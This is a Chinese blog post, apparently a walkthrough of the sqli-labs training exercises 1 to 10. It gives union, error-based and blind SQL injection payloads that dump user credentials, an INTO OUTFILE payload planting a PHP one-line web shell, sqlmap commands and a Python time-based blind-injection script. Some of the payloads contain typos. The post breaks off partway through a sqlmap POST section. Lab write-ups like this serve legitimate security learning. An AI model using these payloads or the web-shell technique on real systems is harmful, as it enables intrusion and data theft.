

<!DOCTYPE html>
<html lang="zh-Hans" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>SQL labs1-10 - Αιώνιος</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="Less1：（基于错误的GET单引号字符型注入)解题思...">
  <meta name="author" content="4v1d">
  <link rel="icon" href="/images/icons/cute.jpg" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/cute.jpg" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/cute.jpg" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/cute.jpg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/cute.jpg">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="https://at.alicdn.com/t/font_1445822_p6ry5n7lrr.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      loading: {
        gif: '/images/theme/loading.gif',
        lottie: ''
      },
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: {
          gif: '/images/theme/loading.gif',
          lottie: ''
        }
      },
      donate: {
        enable: false,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: false
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '我在开了灯的床头下，想问问自己的心啊。',
          typing: true,
          api: 'https://v1.hitokoto.cn/?encode=text&c=d',
          data_contents: ''
        },
      },
      qrcode: {
        enable: true,
        type: 'url',
        image: 'https://pic.izhaoo.com/weapp-code.jpg',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: false,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: false,
        path: 'search.xml'
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Αιώνιος" type="application/atom+xml">
</head>

<body class="lock-screen">
  <div class="loading" id="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
        <i class="iconfont iconqrcode j-navbar-qrcode"></i>
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
    </div>
    <div class="center">SQL labs1-10</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
      <div id="qrcode-navbar"></div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 相册</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="https://gitee.com/dulily/cdn/raw/master/img/bbec7a4d3ae119c17783ed33049764dc.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">SQL labs1-10</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>December 09, 2020</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>6927</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        
        <h4 id="Less1：（基于错误的GET单引号字符型注入"><a href="#Less1：（基于错误的GET单引号字符型注入" class="headerlink" title="Less1：（基于错误的GET单引号字符型注入)"></a>Less1：（基于错误的GET单引号字符型注入)</h4><p>解题思路：</p>
<p><strong>方法一，union 联合查询注入</strong></p>
<p>1，首先判断是否存在注入 / ？id=1’   回显错误，去掉 ‘ 发现回显正常，发现是<strong>单引号字符型注入</strong></p>
<p><strong>注意此时因为前面报错可以看到有limit 0,1我们可以知道此处如果需要输出我们union查询出的信息要将前面的位占了，即使前面的输出为不存在。可以看到我是将id的值写为负值，然后将输出的位置就让给了后面我们需要输出的信息，这个技巧在有输出限制的时候十分重要。</strong></p>
<p>2，然后用 order by 判断有几列数据</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">/ ?id = <span class="hljs-number">1</span>&#x27; <span class="hljs-keyword">order</span> <span class="hljs-title">by</span> <span class="hljs-number">3</span> %<span class="hljs-number">23</span>  <br></code></pre></td></tr></table></figure>

<p>回显正常，order by 4 的时候发现回显错误，说明有3 列</p>
<p><strong>我们上面猜测出了字段数为3，但这里输出的只有2个，所以我们union查询要保证字段数一样，不足的补数字（只有mysql可以），或者null。然后第一个是没有输出的，所以我将需要输出的写在了后面两个。</strong></p>
<p>3，将id=1改为一个数据库不存在的id值，如-1，使用union select 1,2,3联合查询语句查看页面是否有显示位。</p>
<p>发现页面先输出了2和3，说明页面有2个显示位</p>
<p>4，然后利用sql查询语句依次爆破出数据库内的数据库名，表名，列名，字段信息</p>
<p>（1） 爆数据库名：</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lsl">?id=<span class="hljs-number">-1</span>&#x27; union select <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(schema_name) from information_schema.schemata %<span class="hljs-number">23</span><br></code></pre></td></tr></table></figure>

<p><strong>上面的爆出全部的数据库名，\</strong>下面的爆当前的数据库名：****</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lsl">?id=<span class="hljs-number">-1</span>&#x27; union select <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,database() %<span class="hljs-number">23</span><br></code></pre></td></tr></table></figure>

<p>（2） 爆表名：</p>
<figure class="highlight q"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs q">?id=<span class="hljs-number">-1</span>&#x27; <span class="hljs-built_in">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(table_name) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-built_in">tables</span> <span class="hljs-built_in">where</span> table_schema=database() %<span class="hljs-number">23</span><br></code></pre></td></tr></table></figure>

<p>（3）爆字段：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id=-1&#x27; union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-keyword">group_concat</span>(column_name) <span class="hljs-keyword">from</span> information_schema.columns <span class="hljs-keyword">where</span> table_name=<span class="hljs-string">&#x27;users&#x27;</span> <span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>

<p>（4）爆内容：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id=-1&#x27; union <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-keyword">group_concat</span>(username,<span class="hljs-number">0x3a</span>,<span class="hljs-keyword">password</span>) <span class="hljs-keyword">from</span> <span class="hljs-keyword">users</span><span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>

<p>0x3a 代表十六进制的 ‘ ： ’</p>
<p><strong>方法二：手动报错注入</strong></p>
<p>通过报错回显查询信息</p>
<p>1，爆数据库名：</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lsl">?id=<span class="hljs-number">1</span>&#x27; and extractvalue(<span class="hljs-number">1</span>,concat(<span class="hljs-number">0x7e</span>,(database()))) --+<br></code></pre></td></tr></table></figure>

<p>2,爆表：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id=1&#x27; and extractvalue(1,concat(0x7e,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">group_concat</span>(table_name) <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">where</span> table_schema=<span class="hljs-keyword">database</span>()))) <span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>

<p>3，4，直接将 <strong>extractvalue(1,concat(0x7e,(……) ) )</strong>  内的内容修改即可。或者用 <strong>updatexml（1，concat(0x7e,(……),1）</strong></p>
<p><img   class="lazyload" data-original="/2020/12/09/2021/sql/1-10/%E6%8D%95%E8%8E%B7.PNG" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<h4 id="Less-2：-GET型整型注入）"><a href="#Less-2：-GET型整型注入）" class="headerlink" title="Less 2：(GET型整型注入）"></a>Less 2：(GET型整型注入）</h4><p> 今天成功安装了hackbar的旧版本</p>
<p> 链接地址为：<a target="_blank" rel="noopener" href="https://github.com/HCTYMFF/hackbar2.1.3">https://github.com/HCTYMFF/hackbar2.1.3</a> （在火狐浏览器上使用）</p>
<p> 先采用</p>
<p>?id=1 union select 1,2,3–+  发现可行</p>
<p>与之前一样，又在1后加入了引号，出现语法报错</p>
<p>删掉分号，我们修改语句</p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crystal">?id=<span class="hljs-number">1</span> <span class="hljs-class"><span class="hljs-keyword">union</span> <span class="hljs-title">select</span> <span class="hljs-title">group</span>(<span class="hljs-title">schema_name</span>)<span class="hljs-title">from</span> <span class="hljs-title">information_schema</span>.<span class="hljs-title">schemata</span>--+</span><br></code></pre></td></tr></table></figure>

<p>查到关于数据库内部数据</p>
<p>接着修改</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">?id=<span class="hljs-number">1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-keyword">group</span>(<span class="hljs-built_in">schema_name</span>)<span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-string">&#x27;security&#x27;</span><span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>

<p>这里建议将security修改为16进制，0x开头，英文单词用hackbar里的工具转换为16进制数</p>
<p>之后修改为username</p>
<p>得到username和password字名</p>
<p>然后同第一关一样，我们需要让它出现所有的数据</p>
<p>慢慢来</p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crystal">?id=<span class="hljs-number">1</span> <span class="hljs-class"><span class="hljs-keyword">union</span> <span class="hljs-title">select</span> 1,2,<span class="hljs-title">contact_ws</span>(,~<span class="hljs-title">username</span>,<span class="hljs-title">password</span>)<span class="hljs-title">from</span> <span class="hljs-title">securiy</span>.<span class="hljs-title">uesers</span>--+</span><br></code></pre></td></tr></table></figure>

<p>同样这里的~使用十六进制，修改为0x7e</p>
<p>我们再加group_concat 函数得到</p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crystal">?id=-<span class="hljs-number">1221</span> <span class="hljs-class"><span class="hljs-keyword">union</span> <span class="hljs-title">select</span> 1,2,<span class="hljs-title">gruop_concat</span>(<span class="hljs-title">concat_ws</span>(0<span class="hljs-title">x7e</span>,<span class="hljs-title">username</span>,<span class="hljs-title">password</span>)<span class="hljs-title">from</span> <span class="hljs-title">security</span>.<span class="hljs-title">users</span>--+</span><br></code></pre></td></tr></table></figure>

<p>tip:这边加负号是使得id=1失去作用。</p>
<p>最后回显数据，得到链接为：<a target="_blank" rel="noopener" href="http://localhost/Less-2/?id=-1221">http://localhost/Less-2/?id=-1221</a> union select 1,2,group_concat(concat_ws(0x7e,username,password))from security.users–+<img   class="lazyload" data-original="/2020/12/09/2021/sql/1-10/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE(11).png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<h4 id="Less-3-基于错误的get单引号变形字符注入"><a href="#Less-3-基于错误的get单引号变形字符注入" class="headerlink" title="Less-3 (基于错误的get单引号变形字符注入)"></a>Less-3 (基于错误的get单引号变形字符注入)</h4><p>输入 id=1 正常，输入id=1’ # 回显错误 ，根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了，猜想一下咱们输入1在数据库语句中的位置，形如select … from … where id=(‘1’) …，在第一题中id=1‘的后面单引号加上），其它保持不变就行了</p>
<h4 id="Less-4-基于错误的get双引号字符型注入"><a href="#Less-4-基于错误的get双引号字符型注入" class="headerlink" title="Less-4 (基于错误的get双引号字符型注入)"></a>Less-4 (基于错误的get双引号字符型注入)</h4><p>输入 id =1 回显正常  输入 id =1’ 回显正常  输入 id = 1” 回显错误  说明是 双引号闭合型</p>
<p>输入 id = 1” %23 回显错误  说明还有一个 单括号闭合 </p>
<p>输入 id = 1”) …… 其他不变</p>
<h4 id="Less-5-双注入get单引号字符型注入"><a href="#Less-5-双注入get单引号字符型注入" class="headerlink" title="Less-5(双注入get单引号字符型注入)"></a>Less-5(双注入get单引号字符型注入)</h4><p> 第五关与前四关不同，没有了明显的回显，经过资料查询为布尔盲注（bool）</p>
<p>与之前一样我们先利用基本语句，发现id=1’时报错，存在注入；</p>
<p>之后用order by语句查询到至多只有3行；</p>
<p>但是没有了明显的回显后，我们不能再使用union select 联合查询来寻找我们要的数据；</p>
<p>这个时候就使用新的语句 and left(( select database()),1) 进行试探，或是直接进入MySQL控制台使用语句进行查询更加直观</p>
<p>这是用sqlmap跑的数据图</p>
<p><img   class="lazyload" data-original="/2020/12/09/2021/sql/1-10/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE(12).png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ></p>
<p>最后的数据为‘security’   </p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">http</span>://localhost/Less-<span class="hljs-number">5</span>/?id=<span class="hljs-number">1</span>%<span class="hljs-number">27</span>%<span class="hljs-number">20</span>and%<span class="hljs-number">20</span>left%<span class="hljs-number">20</span>((select%<span class="hljs-number">20</span>database()),<span class="hljs-number">8</span>)=%<span class="hljs-number">27</span>security%<span class="hljs-number">27</span>--+<br></code></pre></td></tr></table></figure>

<p>这里推荐函数链接：：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43573676/article/details/105774162">https://blog.csdn.net/qq_43573676/article/details/105774162</a></p>
<h4 id="Less-6-双注入get双引号字符型注入"><a href="#Less-6-双注入get双引号字符型注入" class="headerlink" title="Less-6 (双注入get双引号字符型注入)"></a>Less-6 (双注入get双引号字符型注入)</h4><p>只用将less 5 中的单引号改为 双引号即可</p>
<h4 id="Less-7-导出文件get字符型注入"><a href="#Less-7-导出文件get字符型注入" class="headerlink" title="Less-7 (导出文件get字符型注入)"></a>Less-7 (导出文件get字符型注入)</h4><p>1，补充：<br>@@basedir ：mysql安装路径</p>
<p>@@datadir ：数据库路径</p>
<p><strong>load_file(file_name)：读取文件并返回该文件的内容作为一个字符串</strong></p>
<p><strong>使用条件：必须有权限读取并且文件可读，必须指定文件完整的路径</strong></p>
<p>2，由于我不是在本地搭载的环境，所以知道具体的数据存放路径，需要去获取绝对路径，</p>
<p>前面知道 本题是 单引号 加双括号 的闭合方式：</p>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gauss">?id=<span class="hljs-number">-1</span>&#x27;)) <span class="hljs-built_in">union</span> <span class="hljs-built_in">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-comment">@@</span>datadir --+<br></code></pre></td></tr></table></figure>

<p>获取不了 路径</p>
<p>于是去前面的简单的题找个路径：</p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crystal">Less-<span class="hljs-number">7</span>/?id=-<span class="hljs-number">1</span> <span class="hljs-class"><span class="hljs-keyword">union</span> <span class="hljs-title">select</span> 1,@@<span class="hljs-title">basedir</span>,@@<span class="hljs-title">datadir</span> --+</span><br></code></pre></td></tr></table></figure>

<p>得到路经：<img   class="lazyload" data-original="https://img-blog.csdnimg.cn/20190511131738156.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3Zoa2pod2Jz,size_16,color_FFFFFF,t_70" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  alt="img"></p>
<p>进行文件导入：(这里要用 \ ）</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="xml">http://127.0.0.1/sql/Less-7/?id=-1&#x27;)) union select 1,2,&#x27;</span><span class="php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>($_POST[<span class="hljs-number">1</span>]);<span class="hljs-meta">?&gt;</span></span><span class="xml">&#x27; into outfile &quot;D:\\phpStudy\\PHPTutorial\\WWW\\sql\\Less-7\\test.php&quot; --+</span><br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2020/12/09/2021/sql/1-10/image-20220304104500197.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  alt="image-20220304104500197"></p>
<p><strong>需要注意的是：利用数据库file权限向操作系统写入文件时， 对于相同文件名的文件不能覆盖，所以如果第一次上传chao.php，下次在上传chao.php，就是无效命令了，也就是新的chao,php中的内容并不会覆盖，之前的chao.php</strong></p>
<p>然后用菜刀进行连接</p>
<p> 我自己在尝试第七关的时候，发生了很多次失败，导致sql靶场一度搁浅</p>
<p>现在想想错误应该是这几个：</p>
<p>1.没有//，因为遇到转义时需用//才能使得浏览器解析时为我们自己想要的。</p>
<p>2.格式没有完全对，之前借鉴的博客里可能有一些问题（无意冒犯一些大佬）。</p>
<p>3.对于什么是一句话木马没有一点了解，就连工具antsword也是装了很久才成功。</p>
<p>现在重新撸一下就ok了，记得一句话木马的时候引号会变成乱码，直接在post里写1就好</p>
<p><img   class="lazyload" data-original="/2020/12/09/2021/sql/1-10/image-20220304212018636.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  alt="image-20220304212018636"></p>
<h4 id="Less-8-布尔型单引号GET盲注"><a href="#Less-8-布尔型单引号GET盲注" class="headerlink" title="Less-8 (布尔型单引号GET盲注)"></a>Less-8 (布尔型单引号GET盲注)</h4><p>1，补充：</p>
<p><strong>（1）盲注分为两类：<br>　　　　1.布尔盲注　布尔很明显Ture跟Fales，也就是说它只会根据　你的注入信息返回Ture跟Fales，也就没有了之前的报错信息。<br>　　　　2.时间盲注　界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数，通过查看web页面返回的时间差来判断注入的语句是否正确。</strong></p>
<p>（2）</p>
<p>–batch ： 让sqlmap自动输入</p>
<p>–dbms mysql   ：指定数据库系统为mysql绕过sqlmap的自动检测</p>
<p>-v 显示 等级（0-6）</p>
<p><strong>方法一 ：用sqlmap 按部就班的</strong> 来，最后一步的payload 为：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">sqlmap.py -u <span class="hljs-string">&quot;http://43.247.91.228:84/Less-8/?id=2&quot;</span> --dbms mysql --batch -v 1 --dump -D security -T<span class="hljs-built_in"> users </span>-C <span class="hljs-string">&quot;id,password,username&quot;</span><br></code></pre></td></tr></table></figure>

<p><strong>方法二： 用脚本进行 盲注</strong> </p>
<p>具体操作 参考 <a target="_blank" rel="noopener" href="https://blog.csdn.net/wy_97/article/details/78169623">https://blog.csdn.net/wy_97/article/details/78169623</a> 的详细操作</p>
<p><img   class="lazyload" data-original="/2020/12/09/2021/sql/1-10/image-20220304110331429.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  alt="image-20220304110331429"></p>
<p><strong>方法三： 完全可以按照之前方法慢慢来爆破</strong></p>
<h4 id="Less-9-基于时间的GET单引号盲注"><a href="#Less-9-基于时间的GET单引号盲注" class="headerlink" title="Less-9 (基于时间的GET单引号盲注)"></a>Less-9 (基于时间的GET单引号盲注)</h4><p>脚本gogogo</p>
<p>1，<strong>补充：时间盲注　界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数，通过查看web页面返回的时间差来判断注入的语句是否正确。</strong></p>
<p>2，手工注入实在是太麻烦，将手工注入整理一下写出一个脚本 让机器去注入</p>
<p>代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>value =<span class="hljs-string">&quot;abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@_.-&quot;</span><br><br><br>data=<span class="hljs-string">&quot;&quot;</span><br><br>url = <span class="hljs-string">&quot;http://43.247.91.228:84/Less-9/?id=1&#x27; and if((ascii(substr((&#123;0&#125; limit 3,1),&#123;1&#125;,1)) = &#x27;&#123;2&#125;&#x27;),sleep(3),NULL); %23&quot;</span><br><br><br>url_length=<span class="hljs-string">&quot;http://43.247.91.228:84/Less-9/?id=1&#x27; and if((length((&#123;0&#125; limit 3,1))=&#123;1&#125; ),sleep(3),NULL); %23&quot;</span><br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_length</span>(<span class="hljs-params">payload</span>):</span><br>    <span class="hljs-keyword">for</span> n <span class="hljs-keyword">in</span> range(<span class="hljs-number">1</span>,<span class="hljs-number">100</span>):<br><br>        url= url_length.format(payload,n)<br>        print(url)<br>        <span class="hljs-keyword">if</span>(get_respone(url)):<br>            print(<span class="hljs-string">&quot;[+] length is &#123;0&#125;&quot;</span>.format(n))<br>            <span class="hljs-keyword">return</span> n<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_data</span>(<span class="hljs-params">payload,value,length</span>):</span><br>    <span class="hljs-keyword">for</span> n <span class="hljs-keyword">in</span> range(<span class="hljs-number">1</span>,length):<br>        <span class="hljs-keyword">for</span> v <span class="hljs-keyword">in</span> value :<br>            url_data = url.format(payload,n,ord(v))<br>            print(url_data)<br>            <span class="hljs-keyword">if</span>(get_respone(url_data)):<br>                <span class="hljs-keyword">global</span> data<br>                data=data+v<br>                print(<span class="hljs-string">&quot;[+] data is &#123;0&#125;&quot;</span>.format(data))<br>                <span class="hljs-keyword">break</span><br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_respone</span>(<span class="hljs-params">url</span>):</span><br>    <span class="hljs-keyword">try</span>:<br>        html = requests.get(url,timeout=<span class="hljs-number">2</span>)<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>        print(<span class="hljs-string">&quot;......&quot;</span>)<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br><br>databse_payload =<span class="hljs-string">&quot;select  table_name from information_schema.tables where table_schema = database()&quot;</span><br><br><br>get_data(databse_payload,value,get_length(databse_payload)+<span class="hljs-number">1</span>)<br></code></pre></td></tr></table></figure>

<p><strong>这个脚本你每次只能查询 一个内容，</strong></p>
<p><strong>需要不断改变 4，5，行中 limit x，1 的 x 的数字去查询，</strong></p>
<p><strong>也需要改变 database_payload 去查询不同的信息</strong></p>
<h4 id="Less-10-基于时间的双引号盲注"><a href="#Less-10-基于时间的双引号盲注" class="headerlink" title="Less-10 (基于时间的双引号盲注)"></a>Less-10 (基于时间的双引号盲注)</h4><p>1，只用将第9题中的单引号改为双引号，其他用脚本注入就好</p>
<p><strong>注意，在脚本的第 4，5中的所有的单引号都改为双引号</strong></p>
<h1 id><a href="#" class="headerlink" title></a></h1><h4 id="sqlmap-post类型注入方法："><a href="#sqlmap-post类型注入方法：" class="headerlink" title="sqlmap post类型注入方法："></a>sqlmap post类型注入方法：</h4><p><strong><em>\</em>方法一：（“-r txt ”方式注入）**</strong></p>
<p>1，先用burp suite 抓包，保存为1.txt文件放在桌面上</p>
<p><img   class="lazyload" data-original="https://img-blog.csdnimg.cn/20190523221451758.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3Zoa2pod2Jz,size_16,color_FFFFFF,t_70" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  alt="img"></p>
<p>2，打开sqlmap</p>
<p>查询数据库名：</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">python sqlmap.py -r &quot;c:<span class="hljs-symbol">\U</span>sers<span class="hljs-symbol">\H</span>P<span class="hljs-symbol">\D</span>esktop<span class="hljs-symbol">\1</span>.txt&quot; -p id --dbs<br></code></pre></td></tr></table></figure>

<p>注：-r表示加载一个文件，-p指定参数</p>
<p>之后对应选择输入 ： Y    N     Y</p>
<p>得到：<img   class="lazyload" data-original="https://img-blog.csdnimg.cn/20190523221840906.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3Zoa2pod2Jz,size_16,color_FFFFFF,t_70" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  alt="img"></p>
<p>之后查表：</p>
